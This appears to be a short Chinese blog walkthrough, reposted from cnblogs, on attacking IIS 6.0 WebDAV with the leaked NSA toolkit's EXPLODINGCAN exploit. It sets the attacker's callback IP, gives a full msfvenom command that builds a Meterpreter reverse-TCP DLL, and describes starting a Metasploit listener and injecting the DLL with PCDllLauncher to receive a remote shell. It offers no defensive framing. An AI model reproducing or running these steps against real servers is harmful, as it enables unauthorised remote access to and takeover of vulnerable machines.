标签:下一步 callback win 一个 针对 perm 9.png 工具包 llb
使用NSA工具包针对iis 6.0 webDAV漏洞的工具(explodingcan)
工具的使用就不说了,直接默认选下一直往下,修改下图中的几个地方:
这里输入本机(运行NSA工具包的电脑)外网ip
这里的CallbackIP随意
成功
下一步使用msfvenom生成一个反弹dll:
命令为:msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地IP LPORT=未被占用的端口(我这里是12399) -f dll > c:\12399.dll
(我是在windows安装的metasploit,msf与fb.py运行在同一个电脑)
接下来使用msf开启监听
设置如上图。
开启监听之后,这边fb使用PCdlllancher脚本进行下一步
一路默认,修改一下几个地方
然后在msf接收到shell
标签:下一步 callback win 一个 针对 perm 9.png 工具包 llb
原文地址:http://www.cnblogs.com/websecyw/p/7073776.html